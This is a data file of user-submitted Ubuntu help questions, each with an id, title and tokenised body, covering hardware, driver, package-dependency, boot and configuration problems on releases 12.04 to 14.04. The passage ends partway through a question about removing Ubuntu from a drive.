446932	my cursor jumps all over . i have a sony vpceh35fm with ubuntu 14.04	i have a sony vpceh35fm with ubuntu 13.10 and the trackpad cursor jumps all over . it is extremely hyper and uncontrollable . the longer i use it the more sensitive it gets . the option to disable while typing is checked . i also should mention that the touch pad on this has some sort of sensor on it that it will read a hovering finger . in windows this is supposed to allow you to control with gestures i guess . the laptop came with a sticker stating this . i would really appreciate any help . i love this laptop and have no desire to take ubuntu off and put windows back on .
446933	ubuntu settings wo n't open with gnome 3 desktop installed	so i am running ubuntu 13.10 64 bit , and have been using the gnome 3 desktop since the day i installed 13.10 . however , just recently the settings app has stopped working . when i try to open it through a search on the gnome desktop nothing happens , and when i try gnome-control-center i get the following result : ( gnome-control-center:20095 ) : glib-gobject-warning ** : can not derive 'gnomecontrolcenter ' from non-fundamental parent type 'ccshell' ( gnome-control-center:20095 ) : glib-critical ** : g_once_init_leave : assertion 'result ! = 0 ' failed ( gnome-control-center:20095 ) : glib-gobject-critical ** : g_object_new : assertion 'g_type_is_object ( object_type ) ' failed segmentation fault ( core dumped ) anyone know how to fix this ? any help would be appreciated .
446935	can you bypass filesystem permissions ?	i was using fedora 18 until this morning when i accidently wiped some system files while make a live usb , i can not load fedora or get into the system . now i am running ubuntu 12.04 on a live usb . i have some important documents , some photos and music . i attempted to access the files through nautilus , and i was told i did not have permission . i also attempted to access through terminal , with sudo it told me cd was not a command , without sudo it said access denied . i have an external harddrive ready to copy the files , and i am hoping that its not a total loss .
446937	enable networking on trusty server	i 've just done a clean install of trusty tahr on one computer and transferred the drive to my actual server ( i 'm using an old laptop for my server , as it wouldn't/could n't install and kept dropping to initramfs ) . i 've been having issues with connecting to my network , and i thought the problem was with the hardware , so i tried this : lshm -c network which revealed this : *-network disabled description : ethernet interface product : ar8152 v1.1 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 logical name : p5p1 version : c1 serial : 60 : eb:69:94 : c0:95 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : ( snipped for brevity ) configuration : ( snipped for brevity ) resources : irq:17 memory : d3400000-d343ffff how do i 'enable ' this adapter ?
446939	wi-fi issues 12.04	absolute non technical beginner here so please bear with me ! have installed 12.04 on an old dell 630m and all works well apart from the fact that the wi-fi keeps dropping out from bt router just a few feet away . i have googled around and have checked power management ( off ) have also installed wicd network manager ( no difference ) opening network details produces error message `` the system network services are not compatible with this version '' should perhaps mention that there is no proxy have managed to establish that the wi-fi card is intel pro/wireless 2915abg driver ipw2000 version 1.2.2 kmprq firmware =abg9.0.5.27 ( dec 12 2007 ) when the wi-fi drops , the only way to get it back is to reboot - then everything is ok for a while . i am at the limits of my technical knowledge - googling produces lots of suggestions , most of which mean nothing to me could anyone point me in the right direction ? many thanks
446950	what is ' ? ' in service -- status-all	by this command service -- status-all . i can find all services status . in every line there is + or - or ? . easy to guess + and - which may be refer to running service and not running ( i 'm not sure ) .but do not know this ? symbol meaning before services .
446952	will it make a difference if i connect up my ubuntu server to the router using 'dhcp address reservation ' or 'static routing ' in the router settings ?	i 'm trying to fix the local ip address of my server , and as i gather ( hopefully correctly ) i can use either method to achieve this . the router in question is a netgear wnr2200 . i 'm wondering if this makes a difference , for say speed and security of the server ? i 'm having problems connecting with either method but at least it appears as a recognised device on the router when using dhcp , yet most online sources seem to go with 'static routing ' in their instruction manual . does it make a difference ?
446954	bluetooth issues with ubuntu 12.04 lts	hello i have a dell xps with ubuntu 12.04 lts installed as stock . i also prefer using a mouse so i purchased the lenovo thinkpad bt mouse ( mobtc9la ) . the laptop has bt support and includes bluez for bt connectivity . when i start the laptop there is no immediate bt connectivity . i have to open up blueman-manager and do a pairing with mouse . the mouse is detected and the connected and everything works . i am fine with doing this for now , eventually i would like this to be automated so that at startup it works . the problem is that a few minutes ( 10-15 ) into work my mouse all of the sudden dies . i open the blueman-manager to connect and can not do so . it seems the adapter is not being detected for some odd reason . i try to restart the bluetoothd service and that does not seem to help . i basically end up either having to use the trackpad of the laptop or restarting my laptop to do this all over . in the end i just use the trackpad . i know that wireless mouse are much easier to deal with but currently i do have the bt mouse so i 'd like to use it . my previous laptop sony vaio i had setup the bluetooth manually using dbus commands going through an online tutorial . after doing this manually it worked perfectly , i would start my computer and wallah mouse worked and never dropped . i had lubuntu running on that laptop but no matter i would have thought that this would carry over to the `` newer and better '' laptop . this laptop is suppose to be fully linux compatible since dell ships it with linux pre-installed . i am just not too happy that i invested into this laptop and now ca n't use it the way i prefer . does anyone know why bt on linux is so wishy washy ? i 've read other threads relating to similar issues and some say bt support has gone down the wrong path with linux . anyone have suggestions ? downgrading bluez ? or any other suggestions ? i am tempted to get a usb hub ( my laptop only has 2 ports ) and ditch bt but that just irks me cause i do want my machine to fully work . anyway , i did not purchase this laptop to become a full-time admin . my intention was to use if fully for software development but it 's slowing me down with issues like this . if you need additional info for me to post , let me know please . thank you for any advice !
446956	how to remove a package after incorrect installation attempt	i was trying to install postgresql 9.3 from the downloaded installer : postgresql-9.3.4-3-linux-x64.run still learning the ropes with linux , i believe i originally installed it using an incorrect command . afterwards it did appear to install correctly , but to avoid conflicts with the old 9.1 version , i wanted to clean out all the postgresql* packages . in doing so , using sudo apt-get remove postgresql* , i continue to get the following error : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package postgresql-9.3.4-3-linux-x64.run e : could n't find any package by regex 'postgresql-9.3.4-3-linux-x64.run' i have tried some supposed solutions with related issues but i am unable to remove the specific packages , which does n't seem to be valid or installed anyway , just referencing a mistake i previously tried . how can i remove this unwanted pseudo-package ?
446958	skype and other apps on xubuntu 13.10 64bits	please , read carefully before marking this as duplicate , i 've spent a lot of time looking for a solution to this problem , here and googling , also on xubuntu irc channel , but i ca n't find a fix jet . i 'm on xubuntu 13.10 64bits , here 's my /etc/apt/sources.list ( sources.list.d is empty ) : # # see sources.list ( 5 ) for more information , especialy # remember that you can only use http , ftp or file uris deb http : //archive.ubuntu.com/ubuntu saucy universe main restricted multiverse deb http : //archive.canonical.com/ubuntu/ saucy partner # deb-src http : //archive.canonical.com/ubuntu/ saucy partner # cdroms are managed through the apt-cdrom tool . of course i did this : sudo dpkg -- add-architecture i386 sudo apt-get update after sudo apt-get update i ran sudo apt-get install skype i got this : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin e : unable to correct problems , you have held broken packages . then sudo apt-get install skype-bin : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype-bin : i386 : depends : libqt4-dbus : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqt4-network : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqt4-xml : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqtcore4 : i386 ( > = 4:4.7.0~beta1 ) but it is not going to be installed depends : libqtgui4 : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqtwebkit4 : i386 ( > = 2.2~2011week36 ) but it is not going to be installed depends : libssl1.0.0 : i386 but it is not going to be installed depends : libgl1-mesa-glx : i386 but it is not going to be installed recommends : sni-qt : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . i not only want to install skype but as i 've faced the same issue with other programs such as teamviewer i would like to know exactly what is happening and how to fix it . edit : i found the debug parameter of apt-get , i hope this will bring some light to the problem sudo apt-get -o debug : :pkgproblemresolver=yes install skype-bin reading package lists ... done building dependency tree reading state information ... done starting pkgproblemresolver with broken count : 18 starting 2 pkgproblemresolver with broken count : 18 investigating ( 0 ) libgdk-pixbuf2.0-0 [ amd64 ] < 2.30.7-0ubuntu1 > ( libs ) broken libgdk-pixbuf2.0-0 : amd64 depends on libtiff5 [ amd64 ] < 4.0.3-8 > ( libs ) ( > = 4.0.3 ) considering libtiff5 : amd64 0 as a solution to libgdk-pixbuf2.0-0 : amd64 133 added libtiff5 : amd64 to the remove list fixing libgdk-pixbuf2.0-0 : amd64 via keep of libtiff5 : amd64 investigating ( 0 ) libtiff5 [ amd64 ] < 4.0.3-8 > ( libs ) broken libtiff5 : amd64 breaks on libtiff5 [ i386 ] < none - > 4.0.3-7ubuntu0.1 > ( libs ) ( ! = 4.0.3-8 ) considering libtiff5 : i386 -1 as a solution to libtiff5 : amd64 0 added libtiff5 : i386 to the remove list conflicts//breaks against version 4.0.3-7 for libtiff5 but that is not instver , ignoring fixing libtiff5 : amd64 via keep of libtiff5 : i386 investigating ( 0 ) libqtwebkit4 [ i386 ] < none - > 2.3.2-0ubuntu7 > ( libs ) broken libqtwebkit4 : i386 depends on libfontconfig1 [ i386 ] < none - > 2.11.0-0ubuntu4 > ( libs ) ( > = 2.9.0 ) considering libfontconfig1 : i386 0 as a solution to libqtwebkit4 : i386 -1 holding back libqtwebkit4 : i386 rather than change libfontconfig1 : i386 investigating ( 0 ) libqtgui4 [ i386 ] < none - > 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 > ( libs ) broken libqtgui4 : i386 depends on libfontconfig1 [ i386 ] < none - > 2.11.0-0ubuntu4 > ( libs ) ( > = 2.9.0 ) considering libfontconfig1 : i386 0 as a solution to libqtgui4 : i386 -1 holding back libqtgui4 : i386 rather than change libfontconfig1 : i386 investigating ( 0 ) libqt4-declarative [ i386 ] < none - > 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 > ( libs ) broken libqt4-declarative : i386 depends on libqtgui4 [ i386 ] < none - > 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 > ( libs ) ( = 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 ) considering libqtgui4 : i386 -1 as a solution to libqt4-declarative : i386 -1 holding back libqt4-declarative : i386 rather than change libqtgui4 : i386 investigating ( 1 ) skype-bin [ i386 ] < none - > 4.2.0.11-0ubuntu0.12.04.2 > ( net ) broken skype-bin : i386 depends on libqtgui4 [ i386 ] < none - > 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 > ( libs ) ( > = 4:4.8.0 ) considering libqtgui4 : i386 -1 as a solution to skype-bin : i386 9998 reinst failed early because of fontconfig-config : i386 reinst failed because of libfontconfig1 : i386 broken skype-bin : i386 depends on libqtwebkit4 [ i386 ] < none - > 2.3.2-0ubuntu7 > ( libs ) ( > = 2.2~2011week36 ) considering libqtwebkit4 : i386 -1 as a solution to skype-bin : i386 9998 reinst failed because of libfontconfig1 : i386 considering libqtwebkit4 : i386 -1 as a solution to skype-bin : i386 9998 investigating ( 1 ) sni-qt [ i386 ] < none - > 0.2.6-0ubuntu1 > ( x11 ) broken sni-qt : i386 depends on libqtgui4 [ i386 ] < none - > 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 > ( libs ) ( > = 4:4.7.3 ) considering libqtgui4 : i386 -1 as a solution to sni-qt : i386 0 holding back sni-qt : i386 rather than change libqtgui4 : i386 investigating ( 1 ) libqt4-opengl [ i386 ] < none - > 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 > ( libs ) broken libqt4-opengl : i386 depends on libqtgui4 [ i386 ] < none - > 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 > ( libs ) ( = 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 ) considering libqtgui4 : i386 -1 as a solution to libqt4-opengl : i386 -1 holding back libqt4-opengl : i386 rather than change libqtgui4 : i386 investigating ( 1 ) libdbusmenu-qt2 [ i386 ] < none - > 0.9.3+14.04.20140314-0ubuntu1 > ( libs ) broken libdbusmenu-qt2 : i386 depends on libqtgui4 [ i386 ] < none - > 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 > ( libs ) ( > = 4:4.7.0~beta2 ) considering libqtgui4 : i386 -1 as a solution to libdbusmenu-qt2 : i386 -1 holding back libdbusmenu-qt2 : i386 rather than change libqtgui4 : i386 investigating ( 2 ) skype-bin [ i386 ] < none - > 4.2.0.11-0ubuntu0.12.04.2 > ( net ) broken skype-bin : i386 depends on libqtgui4 [ i386 ] < none - > 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 > ( libs ) ( > = 4:4.8.0 ) considering libqtgui4 : i386 -1 as a solution to skype-bin : i386 9998 broken skype-bin : i386 depends on libqtwebkit4 [ i386 ] < none - > 2.3.2-0ubuntu7 > ( libs ) ( > = 2.2~2011week36 ) considering libqtwebkit4 : i386 -1 as a solution to skype-bin : i386 9998 considering libqtwebkit4 : i386 -1 as a solution to skype-bin : i386 9998 done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype-bin : i386 : depends : libqtgui4 : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqtwebkit4 : i386 ( > = 2.2~2011week36 ) but it is not going to be installed recommends : sni-qt : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages .
446959	no sound in ubuntu 13.10 , tried everything	i 've read through a bunch of differe n't suggestions . i 've restarted/rebuilt alsa as well as pulse audio . i 've ran speakertest . i 've installed ubuntu restricted extras . here 's what 's happening ... when i first boot to ubuntu it says something along the lines of intel hda : no codecs found when i try running hdajackretask at the top it says no codecs found . sorry . the sound button in the top right menu bar is now gone ( i think i broke that by trying to fix everything ) my sound card is encore electronics enm232-8via when i open up 'sound ' in 'system settings ' it shows 1 digital out , and then 2 other outputs ( one amplified , one not ) which i believe are my actual sound card outputs . any help would be great ... thanks !
446962	i ca n't install spotify	i tried to install spotify like million times and every time i got stuck after second step . this is what terminal writes : executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.yvhjnkwkbk -- trustdb-name /etc/apt//trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv-keys 94558f59 gpg : požaduji klíč 94558f59 ze hkp server keyserver.ubuntu.com the last sentence means , that 'i need key 94558f59 from hkp server keyserver ... ' and i do n't know what to do
446963	second monitor not on by default	when i log in , my second monitor is `` off '' by default ; ubuntu acts as if it 's not connected . i can enable it by going to system settings - > displays and flipping the off switch to on , but i 'd rather not do this every time i start up . i do n't know enough about my system to give more detail , but i can run whatever commands you think would be helpful . full steps to reproduce : with laptop off , connect second monitor by vga . turn on laptop . log in at the login screen . ( at the login screen , the second monitor mirrors my laptop . ) wait for the login to complete . while waiting for login to complete , i see the following behavior , in order : the second monitor acts correctly and no longer mirrors . this lasts for a few seconds . both screens show my wallpaper . second monitor no longer detected . my laptop has a black background . login complete . i can see the launcher and my terminal , but the second monitor is black . edit : to add more information , this is ubuntu 12.04 lts on a vaio z series laptop with an acer monitor . i have n't found this particular problem described anywhere , so i have n't tried anything yet . data of interest : lspci xorg.0.log
446968	legacy vs uefi help	are there any drawbacks to installing ubuntu 13.10 ( and soon 14.04 ) in legacy bios instead of uefi ? i have installed 13.10 64bit in legacy by mistake and was just wondering if it would hurt anything to simply leave it there as is ? edit everything seems to be running just fine in legacy and all my drivers work .
446970	ubuntu heat up too much my computer when it uses the integrated intel graphics	my machine is a lenovo g580 with these specifications : processor : intel core i7 3520m graphics : intel core hd graphics 4000 + nvidia geforce 710m ram : 6gb i 'm on ubuntu 13.04 64 bits and i 've set up bumblebee . the computer gets too heat ( more than 70ยบc ) when i leave the cpufreq in `` ondemand '' mode and it should n't since i 'm not doing too intensity-cpu stuff . i think that it 's due to excessive use of intel hd graphics for rendering the screen , because if i put the frequency to 2.9ghz , the temperature is still ok ; but i leave the cpufreq to switch the cpu freq , it warms up . a workaround could use the nvidia graphics card for unity and firefox ( things i 've always opened ) , something i do n't know how to do it . also , i would like to know if , eventually , the optimus nvidia technology ( to change automatically from integrated to dedicated gpus depending on the current graphics/video use . ) it 's going to be supported in linux , either proprietary or open source way .
446971	gigabyte z87n-wifi ubuntu 12.04 wireless card not found	i recently replaced my motherboard with a gigabyte z87n-wifi mobo and a fresh install of ubuntu 12.04 . the dual lan is being recognized however i am not able to use wifi . the wifi adapter is an intel 7260. ifconfig shows : eth0 link encap : ethernet hwaddr 74 : d4:35:16 : f0:75 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:20 memory : f3300000-f3320000 eth1 link encap : ethernet hwaddr 74 : d4:35:16 : f0:77 inet addr:192.168.1.129 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :76d4:35ff : fe16 : f077/64 scope : link inet6 addr : fdfd:3ff9 : d534:0:3dd3:47cd:9ed5 : af65/64 scope : global inet6 addr : fdfd:3ff9 : d534:0:76d4:35ff : fe16 : f077/64 scope : global up broadcast running multicast mtu:1500 metric:1 rx packets:4085 errors:0 dropped:0 overruns:0 frame:0 tx packets:3104 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4319036 ( 4.3 mb ) tx bytes:384527 ( 384.5 kb ) interrupt:19 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:414 errors:0 dropped:0 overruns:0 frame:0 tx packets:414 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:49763 ( 49.7 kb ) tx bytes:49763 ( 49.7 kb ) lspci -nn | grep 0280 shows : network controller [ 0280 ] : intel corporation wireless 7260 [ 8086:08b1 ] ( rev 73 )
446973	official images for wandboard quad	i would like to ask if there will be official images of ubuntu 14.04 for wandboard quad . simply because i saw this reference on http : //ports.ubuntu.com/ . thanks
446974	how to install eclipse for oracle java on ubuntu 12.04	i have oracle java 7 on my system and want to install eclipse and make it use java 7 instead of openjdk . i installed eclipse earlier using synaptic but after doing check updates it did n't work properly , so i removed it along with residual config . i am new to linux
446975	can ubuntu server 12.04.4 lts run .net web pages ?	i just want to know if ubuntu server 12.04.4 lts can run microsoft .net html files . if anyone knows , that would be great .
446976	unable to correct problems , you have held broken packages	trying to install this , i am getting the 'unable to correct problems , you have held broken packages ' error message . apache version server version : apache/2.4.2 ( ubuntu ) server built : jun 27 2012 07:23:35 # aptitude install libapache2-mod-wsgi the following new packages will be installed : apache2.2-common { ab } libapache2-mod-wsgi 0 packages upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 299 kb of archives . after unpacking 1,047 kb will be used . the following packages have unmet dependencies : apache2 : conflicts : apache2.2-common but 2.2.22-1ubuntu1.5 is to be installed . apache2.2-common : depends : apache2.2-bin ( = 2.2.22-1ubuntu1.5 ) but it is not going to be installed . depends : apache2-utils but it is not going to be installed . apache2-bin : conflicts : apache2.2-common but 2.2.22-1ubuntu1.5 is to be installed . apache2-data : conflicts : apache2.2-common but 2.2.22-1ubuntu1.5 is to be installed . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) apache2.2-common [ not installed ] 2 ) libapache2-mod-wsgi [ not installed ] accept this solution ? [ y/n/q/ ? ] y no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . any help appretiated
446981	how do i configure my upstart scripts to take dependencies into account ?	i have install postgresql , atlassian jira , stash , confluence and crowd on a single ubuntu 12.04 server . they are integrated and working per atlassian documentation . one thing i did notice is that the product suite does n't tolerate dependent components being down . for example , if crowd is stopped , users can no longer login . if postgresql is being stopped for maintenance reasons , the dependent applications may never recover . every night the system goes through a maintenance window , during which the operating system and software may be patched . the external dns is configured to gracefully show a maintenance page if there is an error with the applications . every now and then , postgresql may be stopped , patched and then started . how do i configure my upstart scripts to take dependencies into account ? i configured the `` start on '' , but it has no effect . i 'm comfortable writing windows services and configuring their dependencies during install ( e.g . windows installer , or powershell ) . testcases : i stopped all services . i then started confluence , expecting that it would either fail ( since postgresql and crowd is stopped ) , or would automatically attempt to start postgresql and crowd . neither happened . i started all services . i then stopped crowd , expecting that confluence , jira and stash will be stopped . it only stopped crowd and all the other services kept running , but failed to function correctly . dependencies : crowd : postgresql , networking confluence : postgresql , networking , crowd jira : postgresql , networking , crowd stash : postgresql , networking , crowd confluence # confluence description `` atlassian confluence '' start on ( net-device-up and local-filesystems and postgresql and runlevel [ 2345 ] and crowd ) stop on runlevel [ ! 2345 ] respawn kill timeout 30 env run_as_user=confluence env basedir=/usr/local/bin/confluence script logfile=/var/log/confluence/confluence.`date + % y- % m- % d`.log exec su - $ run_as_user -c `` $ basedir/bin/catalina.sh run '' > > $ logfile 2 > & 1 end script jira description `` atlassian jira '' start on ( net-device-up and local-filesystems and postgresql and runlevel [ 2345 ] and crowd ) stop on runlevel [ ! 2345 ] respawn kill timeout 30 env run_as_user=jira env basedir=/usr/local/bin/jira script logfile=/var/log/jira/jira.`date + % y- % m- % d`.log exec su - $ run_as_user -c `` $ basedir/bin/catalina.sh run '' > > $ logfile 2 > & 1 end script stash description `` atlassian stash '' start on ( net-device-up and local-filesystems and postgresql and runlevel [ 2345 ] and crowd ) stop on runlevel [ ! 2345 ] respawn kill timeout 30 env run_as_user=stash env basedir=/usr/local/bin/stash env stash_home= '' /var/local/lib/stash '' script logfile=/var/log/stash/stash.`date + % y- % m- % d`.log exec su - $ run_as_user -c `` $ basedir/bin/start-stash.sh -fg '' > > $ logfile 2 > & 1 end script crowd # crowd description `` atlassian crowd - single sign-on ( sso ) and identity management '' start on ( net-device-up and local-filesystems and postgresql and runlevel [ 2345 ] ) stop on runlevel [ ! 2345 ] respawn kill timeout 30 env run_as_user=crowd env basedir=/usr/local/bin/crowd/apache-tomcat script logfile=/var/log/crowd/crowd.`date + % y- % m- % d`.log exec su - $ run_as_user -c `` $ basedir/bin/catalina.sh run '' > > $ logfile 2 > & 1 end script postgresql was installed via apt and starts up automatically during startup .
446986	can not install any packages using terminal	whenever i tried to install synaptic or other libraries like sudo apt-get install git-core , etc ... it 's showing errors . when it starts running but stops at 22 % and also with many errors . i am not able to install anything . when i tried to install synaptic using sudo apt-get install synaptic it says unable to locate package synaptic . the internet connections are also working . firefox is working but i am unable to download anything through terminal . can someone help me , thanks
446989	no touchpad under mouse and touchpad	i am using lenovo yoga 2 laptop and i installed ubuntu 12.04 32 bit as virtual machine . i want to be able to use 2 finger scroll on ubuntu . other questions says that i need just to enable two finger schroll unger system setings/mouse and touchpad on tab touchpad . see this answer . i am missing tab touchpad , only mouse tab is there . what should i do to get touchpad tab in place . or there is another way to have 2 finger scroll on ubuntu ?
446991	gparted claims whole hard drive is unallocated and gives warning about gpt table	for months i have been happily using my 3tb hard drive , and i still do . today i discovered that gparted shows the whole drive ( /dev/sdb ) as being unallocated . the drive works fine though . clicking for more information in gparted gives me the following warning text : the backup gpt table is not at the end of the disk , as it should be . this might mean that another operating system believes the disk is smaller . fix , by moving the backup to the end ( and removing the old backup ) ? not all of the space available to /dev/sdb appears to be used , you can fix the gpt to use all of the space ( an extra 4294967296 blocks ) or continue with the current setting ? unable to satisfy all constraints on the partition . on the drive sits one single ext4 partition , filling up presumably the whole drive . i was the one formatting it a long time ago , using gparted , if i remember correctly . i ca n't remember details of creating a gpt table . the drive is used only for data and does not contain system files or anything . i do mount it automatically with fstab . in gparted i only have the option of clicking close . see attached screenshots . i 'm not happy to have gparted telling me the drive is unallocated space . what can/should i do to fix this ? the problem i have with experimenting is that i have no other drive that can accommodate my 3tb worth of data , so making backups is an issue . ( before you tell me that i should always backup data , most of the contents on this 3tb drive is my incremental backups from other drives , so i prefer not to lose it . ) running sudo gdisk -l /dev/sdb gives gpt fdisk ( gdisk ) version 0.8.1 partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . warning ! secondary partition table overlaps the last partition by 4294966385 blocks ! try reducing the partition table size by 17179865540 entries . ( use the 's ' item on the experts ' menu . ) disk /dev/sdb : 5860533168 sectors , 2.7 tib logical sector size : 512 bytes disk identifier ( guid ) : 04f5de37-a757-414b-a3e0-f845bd54b767 partition table holds up to 128 entries first usable sector is 34 , last usable sector is 1565565838 partitions will be aligned on 2048-sector boundaries total free space is 2014 sectors ( 1007.0 kib ) number start ( sector ) end ( sector ) size code name 1 2048 5860532223 2.7 tib 0700
446994	forming ipaddresses from text file	i have a huge text file that contains ip addresses scrambled all over but not in one unit for example . so what the @ 192 @ heck are you doing @ 168 @ in my house @ 10 @ .you were not @ 16 @ supposed to be here . what i want is to make an output file and in that make ipadresses file like following 1.192.168.10.16 2.192.223.22.44 etc.. i have good understanding of regular expressions and can extract specific information from a text file but here i need to combine these that where i got confused.how should one approach problem like that ? i am using ubuntu 12.04 .
446996	how to assign keyboard shortcut to a new application in ubuntu 13.10	i am using ubuntu 13.10 . i installed terminator ( terminal emulator ) and after that uninstalled terminal now i want to assign alt+ctrl+t keyboard shortcut to the above said application . is there any way to do it ?
446997	scrolling of listview within a column in qml	below code is working fine ( thanks to sylvain ) , only when scroling , the top row from the listview overwrite the buttonrow . any idea ? â import qtquick 2.0 import ubuntu.components 0.1 mainview { width : units.gu ( 60 ) height : units.gu ( 60 ) listmodel { id : fruitmodel listelement { name : `` apple '' cost : 2.45 } listelement { name : `` orange '' cost : 3.25 } listelement { name : `` banana '' cost : 1.95 } } page { id : test column { spacing : units.gu ( 1 ) id : pagelayout anchors { margins : units.gu ( 2 ) fill : parent } row { id : buttonrow spacing : units.gu ( 1 ) button { objectname : `` button1 '' color : `` white '' text : i18n.tr ( `` help '' ) } button { objectname : `` button2 '' color : `` black '' text : i18n.tr ( `` search '' ) } } item { anchors.top : buttonrow.bottom listview { id : list width : units.gu ( 18 ) height : units.gu ( 3 ) model : fruitmodel boundsbehavior : flickable.stopatbounds delegate : row { text { text : `` fruit : `` + name } text { text : `` cost : $ '' + cost } } } scrollbar { flickableitem : list align : qt.aligntrailing } } } } }
446999	unity ca n't clearly minimize on ubuntu 12.04.4	can anybody help me to solve my problem with unity launcher on my ubuntu 12.04.i have problem when i try to minimize all window on ubuntu , it 's seems that ubuntu not clearly minimize them.i do n't know why . sorry i ca n't post image here due to my low reputation my ubuntu 12.04.4 32bit running on 64bit machine with intel i3 processor , and dual vga primary is intel hd 3000 and second is nvidia geforce 610m ( but i not using nvidia on my ubuntu )
447001	reboot instead of shutdown ubuntu 12.04	as the title suggests , when i try to shutdown my computer from ubuntu 12.04 , it shuts down but then powers back on about three seconds later . i 've changed my grub settings and added : grub_cmdline_linux_default= '' quiet splash acpi=noirq '' but still the same problem . as a result , the only way i am able to shutdown my computer is to go to the bios after the restart and press the power button . maybe it 's my bios ? i have a gigabyte ga-z87x-ud3h , it 's not the biggest deal , but any help resolving the problem would be much appreciated . p.s . sudo shutdown -h now does not work either . plus , i would like more of an elegant solution as this is a family computer .
447002	youtube-dl does n't work on ubuntu 12.04	i installed youtube-dl and run command : youtube-dl https : //www.youtube.com/watch ? v=hqthvw60ov4 .but nothing show . youtube-dl is latest version . thanks for help me !
447004	touchpad not working ( at all ) in ubuntu 13.10	i am new to linux . i do n't know why my touch pad is not working at all . but the mouse is working perfectly well . please help
447010	embedded players do n't display properly in chromium ( or firefox )	i am new to unbuntu . i just installed ubuntu 12.04 on an old dell dimension desktop . it does not have all of the hardware capabilities to run windows 7 . i am very pleased with the ubuntu operating system . i am able to access the internet with this machine using a netgear adapter . all of the webpages that i have visited render beautifully with the exception of those that contained embedded content players . i stream music for my mother online from a particular website . while all of the other content on the webpage containing the player is as it should be , the player itself appears distorted and in a number of colors . the content actually plays well , but , in addition to the display problem , i am unable to directly access the controls for the player ( e.g . stop , play , volume ) . the same thing occurred in firefox . i changed to chromium because i prefer the faster speeds and easier navigation . i was thinking perhaps i have missed a plug-in or browser upgrade . i am wondering if i need to upgrade the flash player or is there some other element that i need to download to help with this issue ! i thank you all in advance for your assistance . please let me know if i need to provide more information .
447017	littlcrane 1.0.7 wo n't launch in ubuntu 12.04	when i try to open `` the little crane that could '' nothing happens . i tried running it from the terminal and this is what i got : current mode : 1366x768 @ 60hz 24bpp err glx : opengl es requested but glx_ext_create_context_es2_profile is unavailable ( 65543 ) glfwcreatewindow ( ) failed thanks in advance !
447022	remove ubuntu from stand-alone hard drive . format drive	i guess that i have no other choice than to add to this question , as seth saw fit to delete the question i thought i was asking as a new question . but whatever . i have a dead computer thanks to my having installed it in the first place . it will not boot either or ny hardbrives , and gives me the same anwser error no such device 3dddc179-e42e-4666-8ff3-00566a57908a entering rescure node grub rescue > all it does is flash the curser nothing more from there . my comeputer is useless as is . i can not load either os , and have no idea how to fix it , short of taking it to a shop . i do n't understand , how to fix it , if i ca n't even open it up . all i want is a straight forward answer on how to fix the problem . as this is the only means i have of contacting anybody on how to fix the prblem . which i assume is in the bios setup . with grub . i need answers , not negative stuff like you need to use the fourm more so that you have more previliges . if anybody really know how i can get my computer back to having just windows 7 and my other hard drive formated again so i can start over . without ubuntu at least until i can figure out how to put the live cds on a usb flashdive . and oen then in the try mode , instead of the install mode as that is all i am given on the cd 's i 've got now . i am either dumb as a rock , or i am brain dead . i have tried and tried to figure out all the in 's and out 's of down loading live cd 's and to boot them so i can check them out before installing . i thought i had downloaded the live cd program that would let me do that . for ubuntu , mint , and zorin . i guess that i downloaded the full version of all three . i do n't know if there are individual downloads for the live cd programs for those os 's as well as full cds ? anyway , i got the cd to open , their was no option to install or open live . i ended up hitting the install . and sent it to a blank stand alone hard drive . it installed , but i am not sure how to open it . anyway i tried to format the drive , and it says that it is now write protected . i would really like to remove everything from that disk , starting over by trying each system , before installing one or more of them on that hard drive . it is 1.5tb . any help you can provide is welcome . and if you can explain exactly how to 